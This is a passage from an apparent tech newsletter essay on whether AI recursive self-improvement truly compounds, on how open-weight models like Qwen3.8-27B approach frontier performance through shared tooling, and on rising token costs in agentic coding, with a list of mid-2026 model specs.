rate? <br><br>That question isn&#8217;t just for AI fireside chats. The answer determines where to invest in infrastructure, in architecture decisions, in vendor relationships, and the wrong answer is currently turning out to be very expensive for a lot of companies. Lurking underneath the latest model question is a more fundamental question about recursive self-improvement: is the development of AI systems meaningfully accelerating in that each generation makes the next one faster to produce? Or are we accumulating capability and dressing it up in the language of compounding? Gregory Bateson&#8217;s distinction between <strong>Learning I</strong> and <strong>Learning II </strong>is salient here: the first changes <em>what</em> a system learns; the second changes <em>how</em> it learns.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-21" href="#footnote-21" target="_self">21</a></p><div class="callout-block" data-callout="true"><p>RSI: Is recursive self-improvement&#8212;AI systems meaningfully accelerating the development of the AI systems that come after them&#8212;actually <strong>compounding</strong> in Bateson&#8217;s sense, or is it <strong>accumulating</strong> dressed up in urgent language?</p></div><p>Anthropic&#8217;s time-horizon benchmark, described in &#8220;When AI Builds Itself&#8221; tracks the length of software tasks an AI agent can complete autonomously to measure speedup over a fixed baseline. They show duration roughly doubling every six to seven months since 2019, with some recent analysis suggesting the doubling period compressed to four months for data since 2023. Anthropic flags its own caveat before anyone else can: lines of code and speedup ratios are imperfect proxies for research quality, and the number almost certainly overstates real productivity gain. But they report it anyway, because the direction, not the magnitude, is the finding. (And the IPO is looming.) But a steady doubling period, however impressive, is still just a steady exponential. </p><p>METR&#8217;s July paper, &#8220;The Economics of Recursive Self-Improvement,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-22" href="#footnote-22" target="_self">22</a> models whether <strong>AI-accelerated AI R&amp;D creates a genuine feedback loop or just a faster version of the same linear process</strong>, and offers a formula for a self-sustaining feedback loop: a one-unit increase in model capability has to raise AI R&amp;D productivity by at least 15 percent. Their math on measured engineer uplift from coding agents puts the real number at around 9 percent since agents launched; a real, positive gain, but falling short of their threshold for the loop to be truly recursive. A July survey of 1,250 arXiv papers from 2024&#8211;2026<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-23" href="#footnote-23" target="_self">23</a>  helps clarify why this is: bounded self-refinement (models revising their own outputs, adapting harnesses, training on synthetic data) is already industrial and convergent; open-ended self-improvement (the version that would actually clear 15 percent) remains bounded by collapse dynamics and compute constraints on every axis measured. MIT Technology Review&#8217;s most recent test of the theory, published this past Tuesday,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-24" href="#footnote-24" target="_self">24</a>  ran Claude Opus 4.8 against two genuinely unpublished NeurIPS 2026 papers to see whether it could do open-ended research rather than scoreable subtasks. They found that while AI systems race ahead on anything that can be scored, research without a clear scoreboard&#8212;the open-ended kind RSI would actually need to close its own loop&#8212;remains a harder problem.</p><p>Accumulation is real and already deployed everywhere, while the compounding case stays theoretical everywhere it&#8217;s been tested rigorously. But it still <em>feels</em> like models are compounding. Doesn&#8217;t each new release make the next one meaningfully cheaper to produce, faster to ship, or better at compounding on itself? What&#8217;s really happening?</p><p><strong>Scaling laws are accumulative, not compounding.</strong> The Kaplan and Chinchilla curves are power laws: loss falls as a smooth, predictable function of compute, parameters, and data, and the exponent doesn&#8217;t move. That predictability is the entire point. A lab publishes a scaling law because it lets you forecast next year&#8217;s benchmark from this year&#8217;s budget. Forecasting only works because the underlying rate holds still while you spend against it. Compounding breaks forecasts like that. A compounding process changes its own rate as it runs; it converts this cycle&#8217;s output into next cycle&#8217;s input. A scaling law promises not to do that. Every dollar of compute buys the same predictable, diminishing slice of loss reduction the previous dollar bought. GPT-5.6 Sol scoring a 52 doesn&#8217;t make the climb to 55 any cheaper per point than the climb to 52 was. The lab pays the curve&#8217;s asking price again, on schedule. Predictable. Nice. </p><div class="callout-block" data-callout="true"><p>Under standard empirical formulations, scaling laws are diminishingly accumulative: achieving linear improvements in performance requires exponential increases in compute, data, and parameters.</p><p>The canonical power-law relation models loss L as a function of compute C:</p><div class="latex-rendered" data-attrs="{&quot;persistentExpression&quot;:&quot;L(C) \\approx \\left(\\frac{C_0}{C}\\right)^{\\alpha}&quot;,&quot;id&quot;:&quot;NEWDVKBSTJ&quot;}" data-component-name="LatexBlockToDOM"></div></div><p>The mechanics driving compounding stem directly from a structural feedback loop: output-to-input conversion.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-25" href="#footnote-25" target="_self">25</a></p><p>At the frontier, the loop closes when a lab uses model N to generate synthetic pre-training data, execute architectural searches, and write optimization code for model N+1, converting static compute expenditure into R&amp;D velocity. Big lab model research remains on the accumulation curve, paying exponentially more compute for each increment of capability, producing better static artifacts at diminishing returns. The open-weight ecosystem achieves comparable results through asymmetric capital extraction: deriving reasoning paths, execution traces, and synthetic outputs from closed frontier APIs at near-zero marginal cost, then feeding those distilled outputs into a shared software stack (quantization algorithms, inference engines, agent harnesses) that persists and improves across model generations. </p><div class="callout-block" data-callout="true"><p style="text-align: justify;">Hugging Face&#8217;s Summer 2026 report methodology drops a bombshell: open-weight compounding stems from shared execution infrastructure that lowers deployment costs for every subsequent generation, and not improvement in model weights, which has a merely accumulative slope.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-26" href="#footnote-26" target="_self">26</a> </p></div><p><mark data-color="#ffff00" style="background-color: rgb(255, 255, 0); color: rgb(0, 0, 0);">This structural divide explains why open-weight models appear to compound fast enough to close the distance to the frontier.</mark> Frontier labs pay the full capital cost of raw scaling to push closed weights forward. The open-weight ecosystem takes those outputs and runs them through a continuous software loop, using distilled outputs to generate synthetic training data, quantization to drop hardware requirements, and optimized harnesses to maximize task performance per token. The competitive unit is not the static parameter set, but the iteration speed of the loop utilizing it. Benchmarks isolate failures, post-training refines the weights, scaffolding extends single-inference capability, and the resulting tooling lowers the barrier for the next build cycle. Frontier labs accumulate value inside the model, but the open-weight ecosystem compounds capability across the loop.</p><div class="pullquote"><p>It isn&#8217;t just that open weights are catching up, <br>it&#8217;s how they are doing so at orders of magnitude less cost.</p></div><h3>Open Wait Models</h3><p>Enterprises have been waiting for open-weight models to catch up with the frontier, on the assumption that the waiting game will pay off with a clear ending; keep the closed models for now, keep watching the open ones, and switch once the numbers get close enough that the decision makes itself. </p><p>Qwen3.6-27b, the model Qwen shipped <em>before</em> Qwen3.8, tied Sonnet 4.6 on Terminal-Bench 2.0 (59.3 to 59.1), which seemed like exactly the kind of result that should move an open model out of the &#8220;not ready yet&#8221; column. Until a researcher ran the same model through Claude Code&#8217;s harness and got 90.0 on SWE-bench Verified (against Sonnet 4.6&#8217;s published 79.6) which showed how real gains accrue thru deployment and orchestration, rather than weights, and that the benchmark was measuring the system wrapped around the model all along. That&#8217;s a problem for anyone waiting on a clean parity signal: if a harness moves the score that much, the milestone the industry has been waiting for was never purely a model-level event to begin with. </p><p>The progress that matters is happening in the gaps between releases rather than in them: harnesses improve, quantization gets better, fine-tuning gets cheaper, inference gets cheaper, deployment tooling matures, and capability shows up across those layers, all of which is what makes the wait so hard to define cleanly. If the goal is parity with the frontier, there&#8217;s a release to wait for. If the goal is practical competitiveness, the relevant progress is continuous and distributed across the stack, which means it&#8217;s accumulating somewhere the release schedule doesn&#8217;t cash out in a compounded benchmark.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-27" href="#footnote-27" target="_self">27</a> </p><p>What is producing this pace? The popular answer &#8220;China is catching up&#8221; is true but incomplete. The more <em>structurally interesting</em> answer is that the open-weight ecosystem is accumulating the machinery required to reproduce, deploy, modify, quantize, evaluate, and build on capability that frontier labs spent billions to develop. Every Qwen release inherits that accumulated substrate: the quantization tooling, the inference optimizations, the benchmark harnesses, the agent scaffolding built on top of previous weights. The frontier labs are accumulating capability inside proprietary models. The open-weight ecosystem is accumulating the machinery that makes that capability deployable by anyone, anywhere, for free.</p><p>That&#8217;s a different economic dynamic. And it&#8217;s compounding faster than the frontier labs&#8217; safety and governance apparatus can match, because as noted, capability is what gets benchmarked, funded, and capital-raised against, not alignment. Judgment about deployment isn&#8217;t a line item anyone is racing to win. The capability gap between open-weight and proprietary models is shrinking faster than the governance gap is closing. Is open-weight vs. frontier a proxy for East vs. West? Or is it just that open weights shift where value accumulates? Frontier labs accumulate value in the weights themselves, which are proprietary. Open-weight models accumulate value in the ecosystem built on top of freely available weights: the inference stacks, the fine-tuning pipelines, the evaluation harnesses, the deployment tooling. It&#8217;s the ecosystem that compounds; the weights are just the accumulated starting point.</p><div class="pullquote"><p>Capability is becoming an accumulated property of the ecosystem <br>rather than a proprietary property of a frontier lab.</p></div><h3>Enter the Dragon</h3><p>As promised, Alibaba shipped Qwen3.8-27B as open weights on August 14 and, at 52, it ranked above GPT-5.3, Gemini 3.1 Pro, and Opus 4.6 on Artificial Analysis&#8217;s Intelligence Index. OpenAI&#8217;s flagship GPT-5.6 Luna only matches that 52 score at its maximum reasoning setting. Over the cloud. Metered. (&#8221;Let that sink in.&#8221;) All of these frontier models were state-of-the-art just a few months ago.  The open-weight model that leapfrogged them has a 4-bit quantized build that runs on a consumer GPU and fits in roughly 17GB of VRAM; a high-end gaming desktop, not a data center. Is the wait finally over? </p><p>Open-weight models match frontier performance at a fraction of the cost because they aren&#8217;t competing on raw training scale, they&#8217;re accumulating the underlying machinery. Proprietary labs hoard capability inside static weights, but the open ecosystem accumulates the quantization runtimes, benchmark harnesses, and agent scaffolding that make capability deployable anywhere for free. </p><p>This structural split comes down to unit cost versus token economics. Behind a metered API, every completion token carries a non-zero marginal cost, forcing developers to budget output length and optimize for token efficiency. On unmetered local infrastructure, the marginal cost per output token drops to zero, fundamentally altering how systems generate capability. Unshackled from API billing, open-weight deployments routinely burn an order of magnitude more completion tokens, trading extended test-time thinking, brute-force reasoning searches, and massive synthetic feedback loops for raw parameter scale. The compounding feedback loop isn&#8217;t happening in the static model; it is happening in the zero-marginal-cost engine driving the output.</p><p>Yet Artificial Analysis annotates its own asterisk to the 52: the scores still need independent validation, the model&#8217;s reasoning can be inefficient by default, and no single leaderboard establishes real parity with what it&#8217;s being compared to. That asterisk is both correct and responsible, and it won&#8217;t really slow anything down, because the number is the legible artifact, not the caveat. The benchmark score compounds into the next comparison table, the next Hacker News thread, the next procurement conversation. Whether the score means what the reader assumes it means does not compound into anything; it gets restated once, by whoever read the methodology, and then it&#8217;s gone. It&#8217;s antimemetic, if you want to be technical.</p><h4><strong>Technical Specs </strong> </h4><ul><li><p><strong>Fable 5 (<span data-color="#888e94" style="color: rgb(136, 142, 148);">Jun 9</span>):</strong> ~1.8T MoE parameters, 1M context (128K max output), $10/$50 per MTok, 30-day strict log retention requirement, native task budgets &amp; context editing</p></li><li><p><strong>Sonnet 5 <span data-color="#777d83" style="color: rgb(119, 125, 131);">(Jun 30)</span>:</strong> Frontier MoE architecture, 1M context (128K max output), $3/$15 per MTok, Zero Data Retention (ZDR) supported, 80.4% Terminal-Bench &amp; 85.2% SWE-bench Verified</p></li><li><p><strong>Grok 4.5 <span data-color="#555b61" style="color: rgb(85, 91, 97);">(Jul 8)</span>:</strong> xAI V9 MoE architecture, 1.5T parameters, 500K context window, $2/$6 per MTok, 80 tok/s output, fine-tuned on Cursor dev telemetry</p></li><li><p><strong>GPT-5.6 Sol <span data-color="#777d83" style="color: rgb(119, 125, 131);">(Jul 9)</span>:</strong> Hybrid dense-reasoning network, 1.05M context, persisted multi-turn reasoning context (<code>reasoning.context</code>), Pro Mode extended search compute, raw pixel-dimension image ingestion</p></li><li><p><strong>Kimi K3 <span data-color="#777d83" style="color: rgb(119, 125, 131);">(Jul 16)</span>:</strong> 1.2T parameter MoE, 256K context, native step-by-step reinforcement search, $1.80/$4.50 per MTok, open-weights base model released under Apache 2.0</p></li><li><p><strong>Gemini 3.6 Flash <span data-color="#777d83" style="color: rgb(119, 125, 131);">(Jul 21)</span>:</strong> Native multimodal runtime, 2M context window, &lt;250ms time-to-first-token (TTFT), Sub-cent token pricing ($0.10/$0.40 per MTok), built-in client tool execution sandbox</p></li><li><p><strong>Opus 5 <span data-color="#777d83" style="color: rgb(119, 125, 131);">(Jul 24)</span>:</strong> Frontier MoE architecture, 1M context (128K max output), $5/$25 per MTok, Fast Mode (2.5x speed/2x cost), SOTA on Frontier-Bench v0.1 (doubles Opus 4.8), Zero Data Retention</p></li><li><p><strong>DeepSeek V4 Pro <span>(Aug 13)</span>:</strong> MoE baseline with active sparse routing, 1M context (384K max output), $0.69/$2.08 per MTok, $0.02 cached read, dual-mode thinking/non-thinking API switch</p></li><li><p><strong>Qwen3.8-Max (Aug 3):</strong> 2.4T-parameter MoE (~95B active), 1M context (131K max output), multimodal text/image/video, $2/$6 per MTok ($0.25/MTok implicit-cache input), native function calling/structured outputs; 86.6 Terminal-Bench 2.1, 67.7 SWE-bench Pro, 86.1 OSWorld-Verified, 92.6 GPQA Diamond, 93.0 PaperBench.</p><ul><li><p><strong>Benchmarks (vs. Opus/Fable/Sol):</strong> On Alibaba&#8217;s Aug. 3 comparison, Qwen3.8-Max scores 86.6 vs 84.6/84.6/88.8 on Terminal-Bench 2.1; 67.7 vs 69.2/80.0/64.6 on SWE-bench Pro; 93.0 vs 80.3/88.8/90.5 on PaperBench; 92.6 vs 92.0/92.6/94.1 on GPQA Diamond; and 82.8 vs 62.2/63.5/72.7 on IFBench.</p></li></ul></li><li><p><strong>Qwen3.8-27B (Aug 14):</strong> 27B-parameter dense multimodal model, native vision + video understanding, 262K native context (extendable to 1M with YaRN), flexible thinking/reasoning control, Apache 2.0 open weights; hybrid Gated DeltaNet + Gated Attention architecture, with MTP.</p></li><li><p><strong>GLM-5.3 (Aug 14):</strong> ~753B-parameter MoE, 1M context, same GLM-5.2 base with scaled post-training, frontier coding/agentic performance, 84.5% CyberGym, 28.3 Terminal-Bench 3.0; staged API/open-weight release due to cybersecurity abilities</p></li><li><p><strong>GLM-5.3 (Aug 14/18):</strong> ~753B-parameter MoE, 1M context, frontier coding/agentic performance; agent-focused runtime with function/tool calling, structured JSON output, and support for asynchronous tool-driven workflows; 84.5% CyberGym, 28.3 Terminal-Bench 3.0; staged API/open-weight release due to cybersec abilities.</p></li><li><p><strong>Inkling (Jul 15):</strong> 975B total / 41B active sparse MoE, native multimodal reasoning (text/image/audio), up to 1M context, controllable thinking effort, Apache 2.0 open weights, customizable/fine-tunable through Tinker</p><ul><li><p><strong>Inkling-Small (Jul 30):</strong> 276B total / 12B active MoE, up to 1M context, native image/audio reasoning, variable thinking effort, Apache 2.0 open weights, ~$0.50/$1.20 per MTok, roughly &#188; the size of Inkling with comparable performance</p></li></ul></li><li><p><strong>Ox Alpha (Aug 20):</strong> Anonymous stealth reasoning/coding model; 1.048M context (~131K max output), text/image/video input, $0 preview pricing, optimized for long-horizon agentic coding; vendor/architecture undisclosed, community evidence currently pointing toward Zhipu/GLM rather than Google</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!mM2B!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!mM2B!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg" width="1264" height="843" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:843,&quot;width&quot;:1264,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1127038,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!mM2B!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80ced115-656e-4577-a327-ade641f8a532_1264x843.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><strong>I&#8217;ll spare you the &#8220;tokenize&#8221; pun here.</strong> </figcaption></figure></div><h1><strong>Tokens Go Brrrr</strong></h1><blockquote><p>Agentic coding tasks <strong>consume roughly a thousand times more tokens</strong> than ordinary code chat or basic reasoning tasks.</p></blockquote><p>That asterisk on Qwen3.8-27B's 52 score<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-28" href="#footnote-28" target="_self">28</a>  said the model's reasoning can be inefficient by default. Nous Research put a number on it: open-weight reasoning models burn one and a half to four times more tokens than closed models for the same answer, up to ten times more on simple questions. Mistral's Magistral models are the worst offenders on record.</p><p>Open-weight models didn&#8217;t reach frontier capability for free. They got there the way anyone gets anywhere fast on no budget: by making more in-game currency. A model taking 10,000 tokens to solve a problem and one taking 1,000 tokens to solve the exact same problem score identically on the leaderboard, yet one costs ten times as much to run. Closed labs feel that directly, on their own balance sheets: Claude Opus 4.7 hit nearly the same accuracy as 4.6 on a quarter of the tokens, a lab explicitly deciding that verbosity was never the actual product. Open-weight projects have no equivalent accounting. A lab ships the weights; whoever deploys them covers the electricity, the GPU time, and the invoice. No bad faith required. Nobody is hiding the token count. Nobody is required to look at it. (See &#8220;Who&#8217;s Job Is It?, op cit.)</p><p>Agentic work turns this from a per-answer cost into a per-trajectory one. A task that once took a single prompt and a single completion now generates context retrieval, tool calls, file inspection, intermediate reasoning, test execution, retries, and corrections, all of it re-sent as input on every subsequent turn. A Stanford Digital Economy Lab study of eight frontier models on SWE-bench Verified found agentic coding tasks consume roughly a thousand times more tokens than ordinary code chat or basic reasoning tasks. The exact same task varies by up to 30x in total token usage from one run to the next. And higher spend doesn&#8217;t reliably buy higher accuracy; performance tends to peak at intermediate compute and degrade past it.</p><p>The open-weight case doesn&#8217;t escape this by being free to run. Artificial Analysis clocked Qwen3.8-27B tokens to reach a score of 52, at 160 million output, against a median of about 45 million for comparable open-weight models. Qwen3.6-27B, the model it replaced, burned 140 million tokens to score 38. The generational jump in capability arrived bundled with a generational jump in verbosity; a model running free on a desktop isn&#8217;t actually free if it needs three and a half times the tokens of its peers to think its way to an answer, and the meter that would normally catch that difference is either not running or if it is no one is noticing. </p><p>Enterprise vendors have noticed. Snowflake&#8217;s August announcement smells like a confession: enterprises have become, in the company&#8217;s words, &#8220;much more rigorous about the economics of AI,&#8221; and are deploying dynamic model routing explicitly to suppress token consumption. The router decides which model is cheap enough for a basic task, which earns a frontier reasoning call, when to retry, and when to cut execution off. The routing is the harness. The harness is where the savings live. </p><p>None of this is a new failure mode, just an inconveniently well-timed one. Researchers have spent two years documenting overthinking: a reasoning model that keeps generating chain-of-thought on a problem it already solved three hundred tokens ago, occasionally talking itself out of the right answer along the way, or spending thousands of tokens rediscovering facts it already established earlier in its own output. Length behaves like an unconstrained hyperparameter, not a virtue. Past some threshold, more of it makes the answer worse. A model trained to always think has no mechanism for asking whether this particular question needed thinking at all.</p><p><strong>We still lack a coherent framework for measuring token quantity </strong>against actual output quality. A token is a billing unit, not a unit of useful work. Which are each optimized for different things. AI researcher Tim Dettmers continuously points out, frontier models force unnecessary token output&#8212;over-thinking and emitting bloated chains-of-thought&#8212;when concise, structured execution is what developers actually need. Because no objective trade-off metric exists, the primary feedback mechanism for token inflation remains the invoice, where a CTO unexpectedly discovers that autonomous developer agents <a href="/__u/ctolunchnyc.substack.com/p/doing-less-with-more#:~:text=Uber%E2%80%99s%20full%2Dyear%20AI%20budget%20was%20exhausted%20by%20April">burned their entire annual API budget by April</a>. More troubling than run rate itself is where the feedback is surfacing; not in a dashboard but a quarterly budget review, months later. Surprise, AI is expensive. We knew that already. What we still don&#8217;t know is how to determine how much of the bill is reasoning that matters and how much is the model being over-optimized for apparent effectiveness over efficiency. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!6nDf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!6nDf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg" width="1343" height="554" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:554,&quot;width&quot;:1343,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:287150,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!6nDf!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4fb364e8-669a-4614-aea0-9440a27d9203_1343x554.jpeg 848w, 